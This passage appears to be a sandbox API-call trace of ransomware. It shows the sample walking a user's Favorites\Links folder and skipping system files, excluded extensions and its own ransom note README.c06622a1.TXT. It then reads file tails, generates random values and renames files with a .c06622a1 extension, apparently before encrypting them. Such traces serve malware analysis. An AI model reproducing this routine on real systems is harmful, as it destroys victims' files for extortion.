(_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 0x32 [0158.999] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0158.999] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8c77e0e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c77e0e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.999] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.999] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0158.999] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0158.999] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0158.999] wcslen (_String="autorun.inf") returned 0xb [0158.999] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0158.999] wcslen (_String="boot.ini") returned 0x8 [0158.999] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0158.999] wcslen (_String="bootfont.bin") returned 0xc [0158.999] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0158.999] wcslen (_String="bootsect.bak") returned 0xc [0158.999] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0158.999] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c77e0e0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c77e0e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c77e0e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.000] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.000] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0159.000] _wcsicmp (_Str1="Suggested Sites.url", _Str2="README.c06622a1.TXT") returned 1 [0159.000] wcsstr (_Str="Suggested Sites.url", _SubStr="README") returned 0x0 [0159.000] _wcsicmp (_Str1="autorun.inf", _Str2="Suggested Sites.url") returned -18 [0159.000] wcslen (_String="autorun.inf") returned 0xb [0159.000] _wcsicmp (_Str1="boot.ini", _Str2="Suggested Sites.url") returned -17 [0159.000] wcslen (_String="boot.ini") returned 0x8 [0159.000] _wcsicmp (_Str1="bootfont.bin", _Str2="Suggested Sites.url") returned -17 [0159.000] wcslen (_String="bootfont.bin") returned 0xc [0159.000] _wcsicmp (_Str1="bootsect.bak", _Str2="Suggested Sites.url") returned -17 [0159.000] wcslen (_String="bootsect.bak") returned 0xc [0159.000] _wcsicmp (_Str1="desktop.ini", _Str2="Suggested Sites.url") returned -15 [0159.000] wcslen (_String="desktop.ini") returned 0xb [0159.000] _wcsicmp (_Str1="iconcache.db", _Str2="Suggested Sites.url") returned -10 [0159.000] wcslen (_String="iconcache.db") returned 0xc [0159.000] _wcsicmp (_Str1="ntldr", _Str2="Suggested Sites.url") returned -5 [0159.000] wcslen (_String="ntldr") returned 0x5 [0159.000] _wcsicmp (_Str1="ntuser.dat", _Str2="Suggested Sites.url") returned -5 [0159.000] wcslen (_String="ntuser.dat") returned 0xa [0159.000] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Suggested Sites.url") returned -5 [0159.000] wcslen (_String="ntuser.dat.log") returned 0xe [0159.000] _wcsicmp (_Str1="ntuser.ini", _Str2="Suggested Sites.url") returned -5 [0159.000] wcslen (_String="ntuser.ini") returned 0xa [0159.000] _wcsicmp (_Str1="thumbs.db", _Str2="Suggested Sites.url") returned 1 [0159.000] wcslen (_String="thumbs.db") returned 0x9 [0159.000] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.000] wcslen (_String="386") returned 0x3 [0159.000] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.000] wcslen (_String="adv") returned 0x3 [0159.000] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.000] wcslen (_String="ani") returned 0x3 [0159.000] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.000] wcslen (_String="bat") returned 0x3 [0159.000] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.000] wcslen (_String="bin") returned 0x3 [0159.000] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.001] wcslen (_String="cab") returned 0x3 [0159.001] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.001] wcslen (_String="cmd") returned 0x3 [0159.001] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.001] wcslen (_String="com") returned 0x3 [0159.001] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.001] wcslen (_String="cpl") returned 0x3 [0159.001] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.001] wcslen (_String="cur") returned 0x3 [0159.001] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.001] wcslen (_String="deskthemepack") returned 0xd [0159.001] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.001] wcslen (_String="diagcab") returned 0x7 [0159.001] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.001] wcslen (_String="diagcfg") returned 0x7 [0159.001] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.001] wcslen (_String="diagpkg") returned 0x7 [0159.001] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.001] wcslen (_String="dll") returned 0x3 [0159.001] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.001] wcslen (_String="drv") returned 0x3 [0159.001] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.001] wcslen (_String="exe") returned 0x3 [0159.001] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.001] wcslen (_String="hlp") returned 0x3 [0159.001] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.001] wcslen (_String="icl") returned 0x3 [0159.001] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.001] wcslen (_String="icns") returned 0x4 [0159.001] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.001] wcslen (_String="ico") returned 0x3 [0159.001] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.001] wcslen (_String="ics") returned 0x3 [0159.001] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.001] wcslen (_String="idx") returned 0x3 [0159.001] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.001] wcslen (_String="ldf") returned 0x3 [0159.001] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.002] wcslen (_String="lnk") returned 0x3 [0159.002] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.002] wcslen (_String="mod") returned 0x3 [0159.002] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.002] wcslen (_String="mpa") returned 0x3 [0159.002] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.002] wcslen (_String="msc") returned 0x3 [0159.002] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.002] wcslen (_String="msp") returned 0x3 [0159.002] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.002] wcslen (_String="msstyles") returned 0x8 [0159.002] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.002] wcslen (_String="msu") returned 0x3 [0159.002] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.002] wcslen (_String="nls") returned 0x3 [0159.002] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.002] wcslen (_String="nomedia") returned 0x7 [0159.002] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.002] wcslen (_String="ocx") returned 0x3 [0159.002] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.002] wcslen (_String="prf") returned 0x3 [0159.002] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.002] wcslen (_String="ps1") returned 0x3 [0159.002] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.002] wcslen (_String="rom") returned 0x3 [0159.002] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.002] wcslen (_String="rtp") returned 0x3 [0159.002] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.002] wcslen (_String="scr") returned 0x3 [0159.002] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.002] wcslen (_String="shs") returned 0x3 [0159.002] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.002] wcslen (_String="spl") returned 0x3 [0159.002] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.002] wcslen (_String="sys") returned 0x3 [0159.002] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.002] wcslen (_String="theme") returned 0x5 [0159.003] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.003] wcslen (_String="themepack") returned 0x9 [0159.003] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.003] wcslen (_String="wpx") returned 0x3 [0159.003] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.003] wcslen (_String="lock") returned 0x4 [0159.003] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.003] wcslen (_String="key") returned 0x3 [0159.003] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.003] wcslen (_String="hta") returned 0x3 [0159.003] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.003] wcslen (_String="msi") returned 0x3 [0159.003] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.003] wcslen (_String="pdb") returned 0x3 [0159.003] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.003] wcslen (_String="sqlite") returned 0x6 [0159.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 0x11 [0159.003] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.003] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0159.003] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 0x31 [0159.003] wcscpy (in: _Dest=0x32400c4, _Source="Suggested Sites.url" | out: _Dest="Suggested Sites.url") returned="Suggested Sites.url" [0159.003] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", dwFileAttributes=0x80) returned 1 [0159.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0159.004] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.004] ReadFile (in: hFile=0x1c0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.005] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x1f5814c0 [0159.005] RtlComputeCrc32 (PartialCrc=0x14c0, Buffer=0x32e9a4, Length=0x80) returned 0x155cf349 [0159.005] RtlComputeCrc32 (PartialCrc=0xf349, Buffer=0x32e9a4, Length=0x80) returned 0xf9a29d6d [0159.005] RtlComputeCrc32 (PartialCrc=0x9d6d, Buffer=0x32e9a4, Length=0x80) returned 0x16f06e41 [0159.005] RtlComputeCrc32 (PartialCrc=0x6e41, Buffer=0x32e9a4, Length=0x80) returned 0x21909be5 [0159.005] CloseHandle (hObject=0x1c0) returned 1 [0159.005] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.005] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" [0159.005] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 0x45 [0159.005] wcscpy (in: _Dest=0x32500f2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.005] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.c06622a1"), dwFlags=0x8) returned 1 [0159.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0159.009] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.009] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x538c6ac [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71b61d23 [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x162200fa [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x382c602f [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a46f8c5 [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x178ec45d [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8e12b0f [0159.013] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ac7a433 [0159.016] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x4e01c7f1 [0159.016] RtlComputeCrc32 (PartialCrc=0xc7f1, Buffer=0x710094, Length=0x80) returned 0x1f00fe6a [0159.016] RtlComputeCrc32 (PartialCrc=0xfe6a, Buffer=0x710094, Length=0x80) returned 0x3c61c5ab [0159.016] RtlComputeCrc32 (PartialCrc=0xc5ab, Buffer=0x710094, Length=0x80) returned 0xa76d5634 [0159.016] RtlComputeCrc32 (PartialCrc=0x5634, Buffer=0x710094, Length=0x80) returned 0xf5f39a2f [0159.016] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.016] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.016] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.016] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0159.016] _wcsicmp (_Str1="Web Slice Gallery.url", _Str2="README.c06622a1.TXT") returned 5 [0159.016] wcsstr (_Str="Web Slice Gallery.url", _SubStr="README") returned 0x0 [0159.016] _wcsicmp (_Str1="autorun.inf", _Str2="Web Slice Gallery.url") returned -22 [0159.016] wcslen (_String="autorun.inf") returned 0xb [0159.016] _wcsicmp (_Str1="boot.ini", _Str2="Web Slice Gallery.url") returned -21 [0159.016] wcslen (_String="boot.ini") returned 0x8 [0159.017] _wcsicmp (_Str1="bootfont.bin", _Str2="Web Slice Gallery.url") returned -21 [0159.017] wcslen (_String="bootfont.bin") returned 0xc [0159.017] _wcsicmp (_Str1="bootsect.bak", _Str2="Web Slice Gallery.url") returned -21 [0159.017] wcslen (_String="bootsect.bak") returned 0xc [0159.017] _wcsicmp (_Str1="desktop.ini", _Str2="Web Slice Gallery.url") returned -19 [0159.017] wcslen (_String="desktop.ini") returned 0xb [0159.017] _wcsicmp (_Str1="iconcache.db", _Str2="Web Slice Gallery.url") returned -14 [0159.017] wcslen (_String="iconcache.db") returned 0xc [0159.017] _wcsicmp (_Str1="ntldr", _Str2="Web Slice Gallery.url") returned -9 [0159.017] wcslen (_String="ntldr") returned 0x5 [0159.017] _wcsicmp (_Str1="ntuser.dat", _Str2="Web Slice Gallery.url") returned -9 [0159.017] wcslen (_String="ntuser.dat") returned 0xa [0159.017] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Web Slice Gallery.url") returned -9 [0159.017] wcslen (_String="ntuser.dat.log") returned 0xe [0159.017] _wcsicmp (_Str1="ntuser.ini", _Str2="Web Slice Gallery.url") returned -9 [0159.017] wcslen (_String="ntuser.ini") returned 0xa [0159.017] _wcsicmp (_Str1="thumbs.db", _Str2="Web Slice Gallery.url") returned -3 [0159.017] wcslen (_String="thumbs.db") returned 0x9 [0159.017] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.017] wcslen (_String="386") returned 0x3 [0159.017] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.017] wcslen (_String="adv") returned 0x3 [0159.017] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.017] wcslen (_String="ani") returned 0x3 [0159.017] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.017] wcslen (_String="bat") returned 0x3 [0159.017] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.017] wcslen (_String="bin") returned 0x3 [0159.017] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.017] wcslen (_String="cab") returned 0x3 [0159.017] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.017] wcslen (_String="cmd") returned 0x3 [0159.017] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.017] wcslen (_String="com") returned 0x3 [0159.017] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.018] wcslen (_String="cpl") returned 0x3 [0159.018] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.018] wcslen (_String="cur") returned 0x3 [0159.018] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.018] wcslen (_String="deskthemepack") returned 0xd [0159.018] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.018] wcslen (_String="diagcab") returned 0x7 [0159.018] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.018] wcslen (_String="diagcfg") returned 0x7 [0159.018] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.018] wcslen (_String="diagpkg") returned 0x7 [0159.018] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.018] wcslen (_String="dll") returned 0x3 [0159.018] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.018] wcslen (_String="drv") returned 0x3 [0159.018] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.018] wcslen (_String="exe") returned 0x3 [0159.018] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.018] wcslen (_String="hlp") returned 0x3 [0159.018] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.018] wcslen (_String="icl") returned 0x3 [0159.018] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.018] wcslen (_String="icns") returned 0x4 [0159.018] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.018] wcslen (_String="ico") returned 0x3 [0159.018] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.018] wcslen (_String="ics") returned 0x3 [0159.018] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.018] wcslen (_String="idx") returned 0x3 [0159.018] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.018] wcslen (_String="ldf") returned 0x3 [0159.018] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.018] wcslen (_String="lnk") returned 0x3 [0159.018] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.018] wcslen (_String="mod") returned 0x3 [0159.018] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.019] wcslen (_String="mpa") returned 0x3 [0159.019] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.019] wcslen (_String="msc") returned 0x3 [0159.019] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.019] wcslen (_String="msp") returned 0x3 [0159.019] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.019] wcslen (_String="msstyles") returned 0x8 [0159.019] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.019] wcslen (_String="msu") returned 0x3 [0159.019] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.019] wcslen (_String="nls") returned 0x3 [0159.019] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.019] wcslen (_String="nomedia") returned 0x7 [0159.019] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.019] wcslen (_String="ocx") returned 0x3 [0159.019] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.019] wcslen (_String="prf") returned 0x3 [0159.019] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.019] wcslen (_String="ps1") returned 0x3 [0159.019] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.019] wcslen (_String="rom") returned 0x3 [0159.019] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.019] wcslen (_String="rtp") returned 0x3 [0159.019] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.019] wcslen (_String="scr") returned 0x3 [0159.019] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.019] wcslen (_String="shs") returned 0x3 [0159.019] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.019] wcslen (_String="spl") returned 0x3 [0159.019] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.019] wcslen (_String="sys") returned 0x3 [0159.019] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.019] wcslen (_String="theme") returned 0x5 [0159.019] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.019] wcslen (_String="themepack") returned 0x9 [0159.020] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.020] wcslen (_String="wpx") returned 0x3 [0159.020] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.020] wcslen (_String="lock") returned 0x4 [0159.020] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.020] wcslen (_String="key") returned 0x3 [0159.020] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.020] wcslen (_String="hta") returned 0x3 [0159.020] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.020] wcslen (_String="msi") returned 0x3 [0159.020] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.020] wcslen (_String="pdb") returned 0x3 [0159.020] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.020] wcslen (_String="sqlite") returned 0x6 [0159.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 0x11 [0159.020] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.020] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0159.020] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 0x31 [0159.020] wcscpy (in: _Dest=0x32400c4, _Source="Web Slice Gallery.url" | out: _Dest="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0159.020] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x80) returned 1 [0159.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0159.021] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.021] ReadFile (in: hFile=0x1b4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.022] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x24cfcbb0 [0159.022] RtlComputeCrc32 (PartialCrc=0xcbb0, Buffer=0x32e9a4, Length=0x80) returned 0x53df1c0f [0159.022] RtlComputeCrc32 (PartialCrc=0x1c0f, Buffer=0x32e9a4, Length=0x80) returned 0xbcef504c [0159.022] RtlComputeCrc32 (PartialCrc=0x504c, Buffer=0x32e9a4, Length=0x80) returned 0x562ac2c9 [0159.022] RtlComputeCrc32 (PartialCrc=0xc2c9, Buffer=0x32e9a4, Length=0x80) returned 0x40d4a575 [0159.022] CloseHandle (hObject=0x1b4) returned 1 [0159.022] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.022] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS 